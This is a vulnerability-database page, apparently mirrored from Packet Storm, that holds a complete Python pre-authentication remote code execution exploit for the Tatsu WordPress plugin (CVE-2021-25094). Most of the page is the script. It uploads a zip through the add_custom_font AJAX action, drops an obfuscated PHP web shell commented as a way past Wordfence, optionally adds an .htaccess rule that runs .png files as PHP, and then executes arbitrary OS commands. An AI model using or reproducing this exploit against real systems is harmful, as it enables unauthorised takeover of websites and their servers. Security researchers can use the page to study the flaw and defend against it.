Vulners
Lucene search
๐ Tatsu 3.3.11 Remote Code Execution
๐๏ธย 18 Apr 2025ย 00:00:00Reported byย Milad KarimiTypeย 
ย packetstorm๐ย packetstorm.news๐ย 332ย Views
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Mephisto | 21 May 202605:06 | โ | githubexploit |
| Exploit for Missing Authentication for Critical Function in Brandexponents Tatsu | 3 Jan 202221:19 | โ | githubexploit |
 | CVE-2021-25094 | 25 Apr 202200:00 | โ | attackerkb |
 | The vulnerability of the `add_custom_font` function in the Tatsu Builder template editing plugin for WordPress website content management system allows a hacker to execute arbitrary code. | 7 Jun 202200:00 | โ | bdu_fstec |
 | CVE-2021-25094 | 17 May 202212:00 | โ | circl |
 | WordPress plugin Tatsu ่ฎฟ้ฎๆงๅถ้่ฏฏๆผๆด | 25 Apr 202200:00 | โ | cnnvd |
 | WordPress Tatsu plugin file upload vulnerability | 27 Apr 202200:00 | โ | cnvd |
 | WordPress Tatsu Plugin Remote Code Execution (CVE-2021-25094) | 30 May 202200:00 | โ | checkpoint_advisories |
 | CVE-2021-25094 | 25 Apr 202215:50 | โ | cve |
 | CVE-2021-25094 Tatsu < 3.3.12 - Unauthenticated RCE | 25 Apr 202215:50 | โ | cvelist |
10
#!/usr/bin/python3
# coding: utf-8
# Exploit Title:Tatsu <= 3.3.11 pre-auth RCE exploit
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Product: Tatsu wordpress plugin <= 3.3.11
# CVE: CVE-2021-25094
# URL: https://tatsubuilder.com/
import sys
import requests
import argparse
import urllib3
import threading
import time
import base64
import queue
import io
import os
import zipfile
import string
import random
from datetime import datetime
urllib3.disable_warnings()
class HTTPCaller():
def __init__(self, url, headers, proxies, cmd):
self.url = url
self.headers = headers
self.proxies = proxies
self.cmd = cmd
self.encodedCmd = base64.b64encode(cmd.encode("utf8"))
self.zipname = None
self.shellFilename = None
if self.url[-1] == '/':
self.url = self.url[:-1]
if proxies:
self.proxies = {"http" : proxies, "https" : proxies}
else:
self.proxies = {}
def generateZip(self, compressionLevel, technique, customShell, keep):
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED, False,
compressionLevel) as zipFile:
if technique == "custom" and customShell and os.path.isfile(customShell):
with open(customShell) as f:
shell = f.readlines()
shell = "\n".join(shell)
self.shellFilename = os.path.basename(customShell)
if self.shellFilename[0] != ".":
self.shellFilename = "." + self.shellFilename
zipFile.writestr(self.shellFilename, shell)
elif technique == "php":
# a lazy obfuscated shell, basic bypass Wordfence
# i would change base64 encoding for something better
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".php"
zipFile.writestr(self.shellFilename, shell)
elif technique.startswith("htaccess"):
# requires AllowOverride All in the apache config file
shell = "AddType application/x-httpd-php .png\n"
zipFile.writestr(".htaccess", shell)
shell = "<?php "
shell += "$f = \"lmeyst\";"
shell += "@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];"
shell += "@$words = array(base64_decode($_POST['text']));"
shell += "$j=\"array\".\"_\".\"filter\";"
shell += "@$filtered_words = $j($words, $a);"
if not keep:
shell += "@unlink('.'+'h'+'t'+'a'+'cc'+'e'+'ss');"
shell += "@unlink(__FILE__);"
self.shellFilename = "." +
(''.join(random.choice(string.ascii_lowercase) for i in range(5))) + ".png"
zipFile.writestr(self.shellFilename, shell)
else:
print("Error: unknow shell technique %s" % technique)
sys.exit(1)
self.zipname = ''.join(random.choice(string.ascii_lowercase) for i in
range(3))
self.zipFile = buffer
def getShellUrl(self):
return "%s/wp-content/uploads/typehub/custom/%s/%s" % (self.url,
self.zipname, self.shellFilename)
def executeCmd(self):
return requests.post(url = self.getShellUrl(), data = {"text":
self.encodedCmd}, headers = self.headers, proxies = self.proxies,
verify=False)
def upload(self):
url = "%s/wp-admin/admin-ajax.php" % self.url
files = {"file": ("%s.zip" % self.zipname, self.zipFile.getvalue())}
return requests.post(url = url, data = {"action": "add_custom_font"},
files = files, headers = self.headers, proxies = self.proxies, verify=False)
def main():
description = "|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress
plugin <= 3.3.8\n"
description += "|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)"
print(description)
print("")
parser = argparse.ArgumentParser()
parser.add_argument("url", help="Wordpress vulnerable URL (example:
https://mywordpress.com/)")
parser.add_argument("cmd", help="OS command to execute")
parser.add_argument('--technique', help="Shell technique: php | htaccess |
custom", default="php")
parser.add_argument('--customShell', help="Provide a custom PHP shell file
that will take a base64 cmd as $_POST['text'] input")
parser.add_argument('--keep', help="Do not auto-destruct the uploaded PHP
shell", default=False, type=bool)
parser.add_argument('--proxy', help="Specify and use an HTTP proxy
(example: http://localhost:8080)")
parser.add_argument('--compressionLevel', help="Compression level of the
zip file (0 to 9, default 9)", default=9, type=int)
args = parser.parse_args()
# Use web browser-like header
headers = {
"X-Requested-With": "XMLHttpRequest",
"Origin": args.url,
"Referer": args.url,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.212 Safari/537.36",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.9"
}
caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)
print("[+] Generating a zip with shell technique '%s'" % args.technique)
caller.generateZip(args.compressionLevel, args.technique,
args.customShell, args.keep)
print("[+] Uploading zip archive to
%s/wp-admin/admin-ajax.php?action=add_custom_font" % (args.url))
r = caller.upload()
if (r.status_code != 200 or not r.text.startswith('{"status":"success"')):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Upload OK")
print("[+] Trigger shell at %s" % caller.getShellUrl())
r = caller.executeCmd()
if (r.status_code != 200):
print("[!] Got an unexpected HTTP response: %d with content:\n%s" %
(r.status_code, r.text))
print("[!] Exploit failed!")
sys.exit(1)
print("[+] Exploit success!")
print(r.text)
if args.keep:
print("[+] Call it with:")
print('curl -X POST -d"text=$(echo "{0}" | base64 -w0)"
{1}'.format(args.cmd, caller.getShellUrl()))
else:
print("[+] Shell file has been auto-deleted but parent directory will
remain on the webserver")
print("[+] Job done")
if __name__ == '__main__':
main()Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2025 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 26.8
CVSS 3.18.1
EPSS0.83535